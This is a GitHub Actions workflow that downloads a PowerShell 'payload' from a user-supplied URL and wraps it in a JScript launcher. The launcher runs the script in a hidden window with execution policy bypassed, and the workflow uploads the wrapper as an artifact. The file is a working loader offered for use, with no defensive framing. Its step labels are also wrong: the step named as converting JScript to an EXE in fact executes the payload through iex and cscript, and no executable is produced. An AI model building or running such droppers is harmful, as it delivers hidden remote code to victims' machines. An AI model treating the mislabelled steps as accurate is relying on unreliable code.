name: Build JScript PowerShell EXE

on:
  workflow_dispatch:
    inputs:
      payload_url:
        description: 'URL to fetch payload'
        required: true
        type: string

jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v3

    - name: Fetch Payload Script
      shell: powershell
      run: |
        $url = '${{ github.event.inputs.payload_url }}'
        Invoke-WebRequest -Uri $url -OutFile 'payload.ps1'

    - name: Create JScript Wrapper
      shell: powershell
      run: |
        @'
        var shell = new ActiveXObject("WScript.Shell");
        shell.Run("powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File payload.ps1", 0, true);
        '@ | Set-Content payload.js

    - name: Convert JScript to EXE
      shell: powershell
      run: |
        iex "cscript.exe payload.js"

    - name: Upload Executable
      uses: actions/upload-artifact@v4
      with:
        name: payload_js
        path: payload.js




